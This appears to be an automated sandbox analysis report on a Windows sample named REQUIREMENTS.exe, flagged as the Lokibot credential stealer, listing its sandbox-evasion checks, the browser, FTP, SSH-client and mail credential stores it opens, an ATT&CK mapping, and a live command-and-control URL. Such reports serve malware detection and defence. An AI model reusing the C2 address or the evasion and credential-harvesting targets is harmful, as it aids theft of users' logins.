                Source: C:\Users\user\Desktop\REQUIREMENTS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeFile read: C:\Users\user\Desktop\REQUIREMENTS.exe:Zone.IdentifierJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\REQUIREMENTS.exe 'C:\Users\user\Desktop\REQUIREMENTS.exe'
                Source: unknownProcess created: C:\Users\user\Desktop\REQUIREMENTS.exe C:\Users\user\Desktop\REQUIREMENTS.exe
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess created: C:\Users\user\Desktop\REQUIREMENTS.exe C:\Users\user\Desktop\REQUIREMENTS.exe
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
                Source: REQUIREMENTS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: REQUIREMENTS.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                Data Obfuscation:

                barindex
                Yara detected aPLib compressed binaryShow sources
                Source: Yara matchFile source: 00000001.00000002.504516698.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.247777957.0000000003A99000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.247574722.0000000002A91000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: REQUIREMENTS.exe PID: 5344, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: REQUIREMENTS.exe PID: 4324, type: MEMORY
                Source: Yara matchFile source: 1.2.REQUIREMENTS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.REQUIREMENTS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: 0_2_04AD7A30 push 8BF04589h; retf
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: 1_2_00402AC0 push eax; ret
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: 1_2_00402AC0 push eax; ret
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess information set: NOGPFAULTERRORBOX

                Malware Analysis System Evasion:

                barindex
                Yara detected AntiVM_3Show sources
                Source: Yara matchFile source: 00000000.00000002.247574722.0000000002A91000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: REQUIREMENTS.exe PID: 4324, type: MEMORY
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                Source: REQUIREMENTS.exe, 00000000.00000002.247574722.0000000002A91000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                Source: REQUIREMENTS.exe, 00000000.00000002.247574722.0000000002A91000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\REQUIREMENTS.exe TID: 1628Thread sleep time: -51890s >= -30000s
                Source: C:\Users\user\Desktop\REQUIREMENTS.exe TID: 5356Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\Desktop\REQUIREMENTS.exe TID: 1384Thread sleep count: 62 > 30
                Source: C:\Users\user\Desktop\REQUIREMENTS.exe TID: 1384Thread sleep time: -3720000s >= -30000s
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
                Source: REQUIREMENTS.exe, 00000000.00000002.247574722.0000000002A91000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: REQUIREMENTS.exe, 00000000.00000002.247574722.0000000002A91000.00000004.00000001.sdmpBinary or memory string: vmware
                Source: REQUIREMENTS.exe, 00000000.00000002.247574722.0000000002A91000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                Source: REQUIREMENTS.exe, 00000000.00000002.247574722.0000000002A91000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: 1_2_0040317B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: 1_2_00402B7C GetProcessHeap,RtlAllocateHeap,
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeMemory allocated: page read and write | page guard
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeProcess created: C:\Users\user\Desktop\REQUIREMENTS.exe C:\Users\user\Desktop\REQUIREMENTS.exe
                Source: REQUIREMENTS.exe, 00000001.00000002.505761375.0000000001AE0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: REQUIREMENTS.exe, 00000001.00000002.505761375.0000000001AE0000.00000002.00000001.sdmpBinary or memory string: Progman
                Source: REQUIREMENTS.exe, 00000001.00000002.505761375.0000000001AE0000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
                Source: REQUIREMENTS.exe, 00000001.00000002.505761375.0000000001AE0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
                Source: REQUIREMENTS.exe, 00000001.00000002.505761375.0000000001AE0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeQueries volume information: C:\Users\user\Desktop\REQUIREMENTS.exe VolumeInformation
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: 1_2_00406069 GetUserNameW,
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information:

                barindex
                Yara detected LokibotShow sources
                Source: Yara matchFile source: 00000001.00000002.504516698.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.247777957.0000000003A99000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.247574722.0000000002A91000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: REQUIREMENTS.exe PID: 5344, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: REQUIREMENTS.exe PID: 4324, type: MEMORY
                Source: Yara matchFile source: 1.2.REQUIREMENTS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.REQUIREMENTS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Yara detected LokibotShow sources
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 00000001.00000002.505715239.000000000149C000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.505673008.0000000001487000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.505542408.0000000001458000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: REQUIREMENTS.exe PID: 5344, type: MEMORY
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
                Tries to harvest and steal browser information (history, passwords, etc)Show sources
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Tries to harvest and steal ftp login credentialsShow sources
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
                Tries to steal Mail credentials (via file access)Show sources
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                Tries to steal Mail credentials (via file registry)Show sources
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: PopPassword
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: SmtpPassword
                Source: Yara matchFile source: 00000001.00000002.504516698.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.247777957.0000000003A99000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.247574722.0000000002A91000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: REQUIREMENTS.exe PID: 5344, type: MEMORY
                Source: Yara matchFile source: 1.2.REQUIREMENTS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.REQUIREMENTS.exe.400000.0.raw.unpack, type: UNPACKEDPE

                Remote Access Functionality:

                barindex
                Yara detected LokibotShow sources
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 00000001.00000002.505715239.000000000149C000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.505673008.0000000001487000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.505542408.0000000001458000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: REQUIREMENTS.exe PID: 5344, type: MEMORY

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management InstrumentationPath InterceptionAccess Token Manipulation1Masquerading1OS Credential Dumping2Security Software Discovery111Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection12Virtualization/Sandbox Evasion2Credentials in Registry2Virtualization/Sandbox Evasion2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Access Token Manipulation1NTDSAccount Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection12LSA SecretsSystem Owner/User Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information2DCSyncSystem Information Discovery13Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                REQUIREMENTS.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                1.2.REQUIREMENTS.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://schemas.microsoft.0%VirustotalBrowse
                http://schemas.microsoft.0%Avira URL Cloudsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://45.134.225.18/plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php1%VirustotalBrowse
                http://45.134.225.18/plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://45.134.225.18/plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.phptrue
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://schemas.microsoft.REQUIREMENTS.exe, 00000000.00000002.247777957.0000000003A99000.00000004.00000001.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
